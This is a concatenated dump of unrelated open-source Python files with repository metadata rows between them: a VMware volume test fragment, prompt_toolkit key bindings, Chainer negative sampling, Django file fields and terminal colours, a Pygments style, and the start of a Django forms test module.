mock.patch.object(vm_util, 'get_host_ref',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm,
fake_get_host_ref,
fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_get_host_ref.assert_called_once_with(
self._volumeops._session, self._volumeops._cluster)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_get_volume_connector(self):
vm_id = 'fake-vm'
vm_ref = mock.MagicMock(value=vm_id)
iqn = 'iscsi-name'
host_ip = 'testhostname'
self.flags(host_ip=host_ip, group='vmware')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_get_host_iqn',
return_value=iqn)
) as (fake_get_vm_ref, fake_iscsi_get_host_iqn):
connector = self._volumeops.get_volume_connector(self._instance)
fake_get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
fake_iscsi_get_host_iqn.assert_called_once_with(self._instance)
self.assertEqual(host_ip, connector['ip'])
self.assertEqual(host_ip, connector['host'])
self.assertEqual(iqn, connector['initiator'])
self.assertEqual(vm_id, connector['instance'])
| apache-2.0 | -7,208,667,700,467,265,000 | 47.405248 | 79 | 0.575559 | false |
m4yers/crutch | crutch/core/repl/keys.py | 1 | 2604 | # -*- coding: utf-8 -*-
# Copyright © 2017 Artyom Goncharov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
from __future__ import print_function
from prompt_toolkit.key_binding.manager import KeyBindingManager
from prompt_toolkit.keys import Keys
def get_key_manager(set_long_options, get_long_options): #pragma: no cover
assert callable(set_long_options)
assert callable(get_long_options)
manager = KeyBindingManager(
enable_search=True,
enable_system_bindings=True,
enable_abort_and_exit_bindings=True)
@manager.registry.add_binding(Keys.F2)
def opt_help(event):
"""
When F2 has been pressed, fill in the "help" command.
"""
event.cli.current_buffer.insert_text("help")
@manager.registry.add_binding(Keys.F3)
def opt_set_options_length(_):
"""
Enable/Disable long option name suggestion.
"""
set_long_options(not get_long_options())
@manager.registry.add_binding(Keys.F10)
def opt_exit(_):
"""
When F10 has been pressed, quit.
"""
# Unused parameters for linter.
raise EOFError
@manager.registry.add_binding(Keys.ControlSpace)
def opt_auto_complete(event):
"""
Initialize autocompletion at cursor. If the autocompletion menu is not
showing, display it with the appropriate completions for the context. If
the menu is showing, select the next completion.
"""
buf = event.cli.current_buffer
if buf.complete_state:
buf.complete_next()
else:
event.cli.start_completion(select_first=False)
return manager
| mit | 6,192,369,523,596,733,000 | 34.175676 | 78 | 0.730695 | false |
umitanuki/chainer | chainer/functions/negative_sampling.py | 4 | 6735 | import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
from chainer.utils import walker_alias
class NegativeSampling(function.Function):
"""Implementation of negative sampling.
In natural language processing, especially language modeling, the number of
vocabulary is very large.
Therefore, you need to spend a lot of time to calculate the gradient of the
embedding matrix.
Instead, in negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \log\sigma(x^\\top w_p) + \\
k E_{i \sim P(i)}[\log\sigma(- x^\\top w_i)],
where :math:`\sigma(\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximeted with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \log\sigma(x^\\top w_p) + \\
\sum_{n \in N} \log\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
in_size (int): Dimension of input vectors.
counts (int list): Number of each identifiers.
sample_size (int): Number of negative samples.
power (float): Power factor :math:`\\alpha`.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
"""
parameter_names = ('W',)
gradient_names = ('gW',)
def __init__(self, in_size, counts, sample_size, power=0.75):
self.sample_size = sample_size
p = numpy.array(counts, numpy.float32)
p = numpy.power(p, p.dtype.type(power))
self.sampler = walker_alias.WalkerAlias(p)
vocab_size = len(counts)
self.W = numpy.zeros((vocab_size, in_size)).astype(numpy.float32)
self.gW = numpy.zeros_like(self.W)
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler.sample((size, self.sample_size + 1))
if isinstance(samples, numpy.ndarray):
samples.T[0] = t
else:
cuda.elementwise(
'T t, int32 m', 'raw T s', 's[i * m] = t;',
'negative_sampling_assign'
)(t, self.sample_size + 1, samples)
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, t_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0]
)
def to_gpu(self, device=None):
super(NegativeSampling, self).to_gpu(device)
self.sampler.to_gpu()
def to_cpu(self):
super(NegativeSampling, self).to_cpu()
self.sampler.to_cpu()
def forward_cpu(self, inputs):
x, t = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
f += x[(i / m) * c + j] * W[k * c + j];
}
wx = f;
''',
'negative_sampling_wx'
)(self.W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
} else {
loss = f + __logf(1 + __expf(-f));
}
y = loss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t = inputs
gloss, = grads
gx = numpy.zeros_like(x)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
self.gW[ik] += ig * ix
return gx, None
def backward_gpu(self, inputs, grads):
x, t = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cuda.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, self.W, self.samples, n_in, self.sample_size + 1, gx)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, self.gW)
return gx, None
| mit | -330,435,326,638,246,140 | 30.325581 | 79 | 0.493244 | false |
alexallah/django | django/db/models/fields/files.py | 11 | 18028 | import datetime
import posixpath
from django import forms
from django.core import checks
from django.core.files.base import File
from django.core.files.images import ImageFile
from django.core.files.storage import default_storage
from django.core.validators import validate_image_file_extension
from django.db.models import signals
from django.db.models.fields import Field
from django.utils.translation import gettext_lazy as _
class FieldFile(File):
def __init__(self, instance, field, name):
super().__init__(None, name)
self.instance = instance
self.field = field
self.storage = field.storage
self._committed = True
def __eq__(self, other):
# Older code may be expecting FileField values to be simple strings.
# By overriding the == operator, it can remain backwards compatibility.
if hasattr(other, 'name'):
return self.name == other.name
return self.name == other
def __hash__(self):
return hash(self.name)
# The standard File contains most of the necessary properties, but
# FieldFiles can be instantiated without a name, so that needs to
# be checked for here.
def _require_file(self):
if not self:
raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)
def _get_file(self):
self._require_file()
if not hasattr(self, '_file') or self._file is None:
self._file = self.storage.open(self.name, 'rb')
return self._file
def _set_file(self, file):
self._file = file
def _del_file(self):
del self._file
file = property(_get_file, _set_file, _del_file)
@property
def path(self):
self._require_file()
return self.storage.path(self.name)
@property
def url(self):
self._require_file()
return self.storage.url(self.name)
@property
def size(self):
self._require_file()
if not self._committed:
return self.file.size
return self.storage.size(self.name)
def open(self, mode='rb'):
self._require_file()
if hasattr(self, '_file') and self._file is not None:
self.file.open(mode)
else:
self.file = self.storage.open(self.name, mode)
return self
# open() doesn't alter the file's contents, but it does reset the pointer
open.alters_data = True
# In addition to the standard File API, FieldFiles have extra methods
# to further manipulate the underlying file, as well as update the
# associated model instance.
def save(self, name, content, save=True):
name = self.field.generate_filename(self.instance, name)
self.name = self.storage.save(name, content, max_length=self.field.max_length)
setattr(self.instance, self.field.name, self.name)
self._committed = True
# Save the object because it has changed, unless save is False
if save:
self.instance.save()
save.alters_data = True
def delete(self, save=True):
if not self:
return
# Only close the file if it's already open, which we know by the
# presence of self._file
if hasattr(self, '_file'):
self.close()
del self.file
self.storage.delete(self.name)
self.name = None
setattr(self.instance, self.field.name, self.name)
self._committed = False
if save:
self.instance.save()
delete.alters_data = True
@property
def closed(self):
file = getattr(self, '_file', None)
return file is None or file.closed
def close(self):
file = getattr(self, '_file', None)
if file is not None:
file.close()
def __getstate__(self):
# FieldFile needs access to its associated model field and an instance
# it's attached to in order to work properly, but the only necessary
# data to be pickled is the file's name itself. Everything else will
# be restored later, by FileDescriptor below.
return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileDescriptor:
"""
The descriptor for the file attribute on the model instance. Return a
FieldFile when accessed so you can write code like::
>>> from myapp.models import MyModel
>>> instance = MyModel.objects.get(pk=1)
>>> instance.file.size
Assign a file object on assignment so you can do::
>>> with open('/path/to/hello.world', 'r') as f:
... instance.file = File(f)
"""
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
# This is slightly complicated, so worth an explanation.
# instance.file`needs to ultimately return some instance of `File`,
# probably a subclass. Additionally, this returned object needs to have
# the FieldFile API so that users can easily do things like
# instance.file.path and have that delegated to the file storage engine.
# Easy enough if we're strict about assignment in __set__, but if you
# peek below you can see that we're not. So depending on the current
# value of the field we have to dynamically construct some sort of
# "thing" to return.
# The instance dict contains whatever was originally assigned
# in __set__.
if self.field.name in instance.__dict__:
file = instance.__dict__[self.field.name]
else:
instance.refresh_from_db(fields=[self.field.name])
file = getattr(instance, self.field.name)
# If this value is a string (instance.file = "path/to/file") or None
# then we simply wrap it with the appropriate attribute class according
# to the file field. [This is FieldFile for FileFields and
# ImageFieldFile for ImageFields; it's also conceivable that user
# subclasses might also want to subclass the attribute class]. This
# object understands how to convert a path to a file, and also how to
# handle None.
if isinstance(file, str) or file is None:
attr = self.field.attr_class(instance, self.field, file)
instance.__dict__[self.field.name] = attr
# Other types of files may be assigned as well, but they need to have
# the FieldFile interface added to them. Thus, we wrap any other type of
# File inside a FieldFile (well, the field's attr_class, which is
# usually FieldFile).
elif isinstance(file, File) and not isinstance(file, FieldFile):
file_copy = self.field.attr_class(instance, self.field, file.name)
file_copy.file = file
file_copy._committed = False
instance.__dict__[self.field.name] = file_copy
# Finally, because of the (some would say boneheaded) way pickle works,
# the underlying FieldFile might not actually itself have an associated
# file. So we need to reset the details of the FieldFile in those cases.
elif isinstance(file, FieldFile) and not hasattr(file, 'field'):
file.instance = instance
file.field = self.field
file.storage = self.field.storage
# Make sure that the instance is correct.
elif isinstance(file, FieldFile) and instance is not file.instance:
file.instance = instance
# That was fun, wasn't it?
return instance.__dict__[self.field.name]
def __set__(self, instance, value):
instance.__dict__[self.field.name] = value
class FileField(Field):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = FieldFile
# The descriptor to use for accessing the attribute off of the class.
descriptor_class = FileDescriptor
description = _("File")
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
self._primary_key_set_explicitly = 'primary_key' in kwargs
self.storage = storage or default_storage
self.upload_to = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_primary_key())
errors.extend(self._check_upload_to())
return errors
def _check_primary_key(self):
if self._primary_key_set_explicitly:
return [
checks.Error(
"'primary_key' is not a valid argument for a %s." % self.__class__.__name__,
obj=self,
id='fields.E201',
)
]
else:
return []
def _check_upload_to(self):
if isinstance(self.upload_to, str) and self.upload_to.startswith('/'):
return [
checks.Error(
"%s's 'upload_to' argument must be a relative path, not an "
"absolute path." % self.__class__.__name__,
obj=self,
id='fields.E202',
hint='Remove the leading slash.',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if kwargs.get("max_length") == 100:
del kwargs["max_length"]
kwargs['upload_to'] = self.upload_to
if self.storage is not default_storage:
kwargs['storage'] = self.storage
return name, path, args, kwargs
def get_internal_type(self):
return "FileField"
def get_prep_value(self, value):
value = super().get_prep_value(value)
# Need to convert File objects provided via a form to string for database insertion
if value is None:
return None
return str(value)
def pre_save(self, model_instance, add):
file = super().pre_save(model_instance, add)
if file and not file._committed:
# Commit the file to storage prior to saving the model
file.save(file.name, file.file, save=False)
return file
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
setattr(cls, self.name, self.descriptor_class(self))
def generate_filename(self, instance, filename):
"""
Apply (if callable) or prepend (if a string) upload_to to the filename,
then delegate further processing of the name to the storage backend.
Until the storage layer, all file paths are expected to be Unix style
(with forward slashes).
"""
if callable(self.upload_to):
filename = self.upload_to(instance, filename)
else:
dirname = datetime.datetime.now().strftime(self.upload_to)
filename = posixpath.join(dirname, filename)
return self.storage.generate_filename(filename)
def save_form_data(self, instance, data):
# Important: None means "no change", other false value means "clear"
# This subtle distinction (rather than a more explicit marker) is
# needed because we need to consume values that are also sane for a
# regular (non Model-) Form to find in its cleaned_data dictionary.
if data is not None:
# This value will be converted to str and stored in the
# database, so leaving False as-is is not acceptable.
if not data:
data = ''
setattr(instance, self.name, data)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FileField, 'max_length': self.max_length}
defaults.update(kwargs)
return super().formfield(**defaults)
class ImageFileDescriptor(FileDescriptor):
"""
Just like the FileDescriptor, but for ImageFields. The only difference is
assigning the width/height to the width_field/height_field, if appropriate.
"""
def __set__(self, instance, value):
previous_file = instance.__dict__.get(self.field.name)
super().__set__(instance, value)
# To prevent recalculating image dimensions when we are instantiating
# an object from the database (bug #11084), only update dimensions if
# the field had a value before this assignment. Since the default
# value for FileField subclasses is an instance of field.attr_class,
# previous_file will only be None when we are called from
# Model.__init__(). The ImageField.update_dimension_fields method
# hooked up to the post_init signal handles the Model.__init__() cases.
# Assignment happening outside of Model.__init__() will trigger the
# update right here.
if previous_file is not None:
self.field.update_dimension_fields(instance, force=True)
class ImageFieldFile(ImageFile, FieldFile):
def delete(self, save=True):
# Clear the image dimensions cache
if hasattr(self, '_dimensions_cache'):
del self._dimensions_cache
super().delete(save)
class ImageField(FileField):
default_validators = [validate_image_file_extension]
attr_class = ImageFieldFile
descriptor_class = ImageFileDescriptor
description = _("Image")
def __init__(self, verbose_name=None, name=None, width_field=None, height_field=None, **kwargs):
self.width_field, self.height_field = width_field, height_field
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_image_library_installed())
return errors
def _check_image_library_installed(self):
try:
from PIL import Image # NOQA
except ImportError:
return [
checks.Error(
'Cannot use ImageField because Pillow is not installed.',
hint=('Get Pillow at https://pypi.python.org/pypi/Pillow '
'or run command "pip install Pillow".'),
obj=self,
id='fields.E210',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.width_field:
kwargs['width_field'] = self.width_field
if self.height_field:
kwargs['height_field'] = self.height_field
return name, path, args, kwargs
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
# Attach update_dimension_fields so that dimension fields declared
# after their corresponding image field don't stay cleared by
# Model.__init__, see bug #11196.
# Only run post-initialization dimension update on non-abstract models
if not cls._meta.abstract:
signals.post_init.connect(self.update_dimension_fields, sender=cls)
def update_dimension_fields(self, instance, force=False, *args, **kwargs):
"""
Update field's width and height fields, if defined.
This method is hooked up to model's post_init signal to update
dimensions after instantiating a model instance. However, dimensions
won't be updated if the dimensions fields are already populated. This
avoids unnecessary recalculation when loading an object from the
database.
Dimensions can be forced to update with force=True, which is how
ImageFileDescriptor.__set__ calls this method.
"""
# Nothing to update if the field doesn't have dimension fields or if
# the field is deferred.
has_dimension_fields = self.width_field or self.height_field
if not has_dimension_fields or self.attname not in instance.__dict__:
return
# getattr will call the ImageFileDescriptor's __get__ method, which
# coerces the assigned value into an instance of self.attr_class
# (ImageFieldFile in this case).
file = getattr(instance, self.attname)
# Nothing to update if we have no file and not being forced to update.
if not file and not force:
return
dimension_fields_filled = not(
(self.width_field and not getattr(instance, self.width_field)) or
(self.height_field and not getattr(instance, self.height_field))
)
# When both dimension fields have values, we are most likely loading
# data from the database or updating an image field that already had
# an image stored. In the first case, we don't want to update the
# dimension fields because we are already getting their values from the
# database. In the second case, we do want to update the dimensions
# fields and will skip this return because force will be True since we
# were called from ImageFileDescriptor.__set__.
if dimension_fields_filled and not force:
return
# file should be an instance of ImageFieldFile or should be None.
if file:
width = file.width
height = file.height
else:
# No file, so clear dimensions fields.
width = None
height = None
# Update the width and height fields.
if self.width_field:
setattr(instance, self.width_field, width)
if self.height_field:
setattr(instance, self.height_field, height)
def formfield(self, **kwargs):
defaults = {'form_class': forms.ImageField}
defaults.update(kwargs)
return super().formfield(**defaults)
| bsd-3-clause | -2,786,124,613,586,705,000 | 37.769892 | 100 | 0.619037 | false |
Medigate/cutiuta-server | cutiuta-server/env/lib/python3.4/site-packages/django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'SUCCESS': {},
'WARNING': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a palette definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a background color.
bg is a background color.
option is a display options.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the palette
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
| gpl-3.0 | 8,024,579,316,895,611,000 | 33.121495 | 89 | 0.529581 | false |
javierTerry/odoo | addons/web/doc/_themes/flask_theme_support.py | 2228 | 4875 | # flasky extensions. flasky pygments style based on tango style
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class FlaskyStyle(Style):
background_color = "#f8f8f8"
default_style = ""
styles = {
# No corresponding class for the following:
#Text: "", # class: ''
Whitespace: "underline #f8f8f8", # class: 'w'
Error: "#a40000 border:#ef2929", # class: 'err'
Other: "#000000", # class 'x'
Comment: "italic #8f5902", # class: 'c'
Comment.Preproc: "noitalic", # class: 'cp'
Keyword: "bold #004461", # class: 'k'
Keyword.Constant: "bold #004461", # class: 'kc'
Keyword.Declaration: "bold #004461", # class: 'kd'
Keyword.Namespace: "bold #004461", # class: 'kn'
Keyword.Pseudo: "bold #004461", # class: 'kp'
Keyword.Reserved: "bold #004461", # class: 'kr'
Keyword.Type: "bold #004461", # class: 'kt'
Operator: "#582800", # class: 'o'
Operator.Word: "bold #004461", # class: 'ow' - like keywords
Punctuation: "bold #000000", # class: 'p'
# because special names such as Name.Class, Name.Function, etc.
# are not recognized as such later in the parsing, we choose them
# to look the same as ordinary variables.
Name: "#000000", # class: 'n'
Name.Attribute: "#c4a000", # class: 'na' - to be revised
Name.Builtin: "#004461", # class: 'nb'
Name.Builtin.Pseudo: "#3465a4", # class: 'bp'
Name.Class: "#000000", # class: 'nc' - to be revised
Name.Constant: "#000000", # class: 'no' - to be revised
Name.Decorator: "#888", # class: 'nd' - to be revised
Name.Entity: "#ce5c00", # class: 'ni'
Name.Exception: "bold #cc0000", # class: 'ne'
Name.Function: "#000000", # class: 'nf'
Name.Property: "#000000", # class: 'py'
Name.Label: "#f57900", # class: 'nl'
Name.Namespace: "#000000", # class: 'nn' - to be revised
Name.Other: "#000000", # class: 'nx'
Name.Tag: "bold #004461", # class: 'nt' - like a keyword
Name.Variable: "#000000", # class: 'nv' - to be revised
Name.Variable.Class: "#000000", # class: 'vc' - to be revised
Name.Variable.Global: "#000000", # class: 'vg' - to be revised
Name.Variable.Instance: "#000000", # class: 'vi' - to be revised
Number: "#990000", # class: 'm'
Literal: "#000000", # class: 'l'
Literal.Date: "#000000", # class: 'ld'
String: "#4e9a06", # class: 's'
String.Backtick: "#4e9a06", # class: 'sb'
String.Char: "#4e9a06", # class: 'sc'
String.Doc: "italic #8f5902", # class: 'sd' - like a comment
String.Double: "#4e9a06", # class: 's2'
String.Escape: "#4e9a06", # class: 'se'
String.Heredoc: "#4e9a06", # class: 'sh'
String.Interpol: "#4e9a06", # class: 'si'
String.Other: "#4e9a06", # class: 'sx'
String.Regex: "#4e9a06", # class: 'sr'
String.Single: "#4e9a06", # class: 's1'
String.Symbol: "#4e9a06", # class: 'ss'
Generic: "#000000", # class: 'g'
Generic.Deleted: "#a40000", # class: 'gd'
Generic.Emph: "italic #000000", # class: 'ge'
Generic.Error: "#ef2929", # class: 'gr'
Generic.Heading: "bold #000080", # class: 'gh'
Generic.Inserted: "#00A000", # class: 'gi'
Generic.Output: "#888", # class: 'go'
Generic.Prompt: "#745334", # class: 'gp'
Generic.Strong: "bold #000000", # class: 'gs'
Generic.Subheading: "bold #800080", # class: 'gu'
Generic.Traceback: "bold #a40000", # class: 'gt'
}
| agpl-3.0 | -7,218,263,949,294,705,000 | 55.686047 | 83 | 0.435897 | false |
wfxiang08/django178 | django/contrib/formtools/tests/wizard/namedwizardtests/forms.py | 95 | 1760 | import os
import tempfile
from django import forms
from django.core.files.storage import FileSystemStorage
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template import Template, Context
from django.contrib.auth.models import User
